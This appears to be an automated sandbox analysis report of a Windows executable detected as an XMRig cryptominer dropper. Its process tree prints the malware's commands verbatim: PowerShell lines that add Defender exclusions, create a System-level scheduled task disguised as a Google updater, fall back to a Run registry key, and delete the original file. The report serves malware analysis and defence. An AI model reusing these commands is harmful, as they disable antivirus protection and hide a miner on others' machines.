Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    399s
  • max time network
    1787s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    25-01-2024 16:55

General

  • Target

    grhsghsGHswgh/Y2JYGshMHJGuGREA.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1204
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2076
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2976
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2604
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2792
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2124
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1980
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        PID:1628
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:1660
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe qtdiqnkejoz
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:1560
    • C:\Windows\System32\choice.exe
      choice /C Y /N /D Y /T 3
      1⤵
        PID:2472
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {ACF1A85A-9069-406D-85C6-3BFE5F21AC14} S-1-5-18:NT AUTHORITY\System:Service:
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Program Files\Google\Chrome\updater.exe
          "C:\Program Files\Google\Chrome\updater.exe"
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2780
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        1⤵
          PID:3048
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1772

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          233KB

          MD5

          1e91f03715d8317e984b718bf58b49dd

          SHA1

          182aae8e48fc6a43e0b7ddfdf338afc3db1c5570

          SHA256

          d1f81ef09dfe20a7e90ba931d8f0ded8e1ba8279ef8513803f7135613723c92f

          SHA512

          7d2f04574d7ce59ad1e54f43ade319272d7d611f46907bfbacb654c2520082867152b2bea0fbea6e6608d91f43bc13b73c0f13229195ec7b18efaa03c64fb9f0

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          105KB

          MD5

          826b80b46d02e87cea4789df6fa38987

          SHA1

          69fac612c07268f0765542b006ef83eb1155f2f0

          SHA256

          156d90dc3806278d285e95e6e96d03f5ef9d975bff5669018b101a9f4bfd556d

          SHA512

          ca04d42b6c365d354ab0d9fd3dd65e311f2b3d4a650ac539a8966d5a22bbd7d8c54b54811dd657506d3224dc017b6d776e0ba233a3981f8f00d5d1b71f3b5ef7

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          8ae094bd1b572c9432c9862fe7fe1869

          SHA1

          e0a8e12ebbfce671ea5ac1b157433be73b1ff26e

          SHA256

          115ecc182977045803007e2b45de8e108806456ea6e06be4d65d468a7fd0b459

          SHA512

          d0970e62d4c5ac716d0483defd919839f1b296f45b5320d137688f1eab7e71b81252d5225f70730e619d029e3adf412d7bac1defc7e7ccf9241f884ecbacaffa

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          239KB

          MD5

          a8a8f1171b8f3ae856ee2635268cbef0

          SHA1

          05f97363aa145e987a5c31efd5fb916b170c1e2f

          SHA256

          4ddaf4f830132ccf95d6fb64c5c68c451a1c73cfa8260b2b97e6305af6861962

          SHA512

          d83d9ede8caa20a2b5e8f386cb82088b60c307124315472d5c9c505d7f7e17fefc62f16077ab868e5fe3270c93d34e5146afd68d2b32082310d62a73ea8f0967

        • memory/1560-70-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1560-78-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1980-110-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-102-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-69-0x0000000000770000-0x0000000000790000-memory.dmp
          Filesize

          128KB

        • memory/1980-68-0x0000000000750000-0x0000000000770000-memory.dmp
          Filesize

          128KB

        • memory/1980-136-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-134-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-132-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-130-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-128-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-126-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-124-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-122-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-120-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-118-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-116-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-114-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-65-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-66-0x00000000002B0000-0x00000000002D0000-memory.dmp
          Filesize

          128KB

        • memory/1980-71-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-108-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-106-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-104-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-74-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-100-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-98-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-96-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-94-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-87-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-85-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-83-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-81-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-79-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-75-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1980-77-0x0000000000770000-0x0000000000790000-memory.dmp
          Filesize

          128KB

        • memory/1980-76-0x0000000000750000-0x0000000000770000-memory.dmp
          Filesize

          128KB

        • memory/2076-8-0x0000000002A00000-0x0000000002A80000-memory.dmp
          Filesize

          512KB

        • memory/2076-7-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2076-6-0x0000000002280000-0x0000000002288000-memory.dmp
          Filesize

          32KB

        • memory/2076-9-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2076-12-0x0000000002A00000-0x0000000002A80000-memory.dmp
          Filesize

          512KB

        • memory/2076-11-0x0000000002A00000-0x0000000002A80000-memory.dmp
          Filesize

          512KB

        • memory/2076-10-0x0000000002A00000-0x0000000002A80000-memory.dmp
          Filesize

          512KB

        • memory/2076-13-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2076-5-0x000000001B670000-0x000000001B952000-memory.dmp
          Filesize

          2.9MB

        • memory/2604-36-0x0000000002820000-0x00000000028A0000-memory.dmp
          Filesize

          512KB

        • memory/2604-35-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2604-41-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2604-40-0x0000000002820000-0x00000000028A0000-memory.dmp
          Filesize

          512KB

        • memory/2604-39-0x0000000002820000-0x00000000028A0000-memory.dmp
          Filesize

          512KB

        • memory/2604-38-0x0000000002820000-0x00000000028A0000-memory.dmp
          Filesize

          512KB

        • memory/2604-37-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2656-29-0x000000013F2A0000-0x000000013F4B1000-memory.dmp
          Filesize

          2.1MB

        • memory/2656-0-0x000000013F2A0000-0x000000013F4B1000-memory.dmp
          Filesize

          2.1MB

        • memory/2716-23-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/2716-25-0x0000000002810000-0x0000000002890000-memory.dmp
          Filesize

          512KB

        • memory/2716-19-0x000000001B4C0000-0x000000001B7A2000-memory.dmp
          Filesize

          2.9MB

        • memory/2716-22-0x00000000026D0000-0x00000000026D8000-memory.dmp
          Filesize

          32KB

        • memory/2716-21-0x0000000002810000-0x0000000002890000-memory.dmp
          Filesize

          512KB

        • memory/2716-20-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/2716-24-0x0000000002810000-0x0000000002890000-memory.dmp
          Filesize

          512KB

        • memory/2716-26-0x0000000002810000-0x0000000002890000-memory.dmp
          Filesize

          512KB

        • memory/2716-27-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/2780-45-0x000000013F370000-0x000000013F581000-memory.dmp
          Filesize

          2.1MB

        • memory/2780-67-0x000000013F370000-0x000000013F581000-memory.dmp
          Filesize

          2.1MB

        • memory/2792-54-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2792-55-0x0000000001380000-0x0000000001400000-memory.dmp
          Filesize

          512KB

        • memory/2792-58-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2792-53-0x0000000001380000-0x0000000001400000-memory.dmp
          Filesize

          512KB

        • memory/2792-52-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2792-57-0x0000000001380000-0x0000000001400000-memory.dmp
          Filesize

          512KB

        • memory/2792-56-0x0000000001380000-0x0000000001400000-memory.dmp
          Filesize

          512KB

        • memory/2844-72-0x0000000001650000-0x00000000016D0000-memory.dmp
          Filesize

          512KB

        • memory/2844-48-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/2844-47-0x0000000001650000-0x00000000016D0000-memory.dmp
          Filesize

          512KB

        • memory/2844-46-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/2844-51-0x0000000001650000-0x00000000016D0000-memory.dmp
          Filesize

          512KB

        • memory/2844-50-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/2844-49-0x0000000001650000-0x00000000016D0000-memory.dmp
          Filesize

          512KB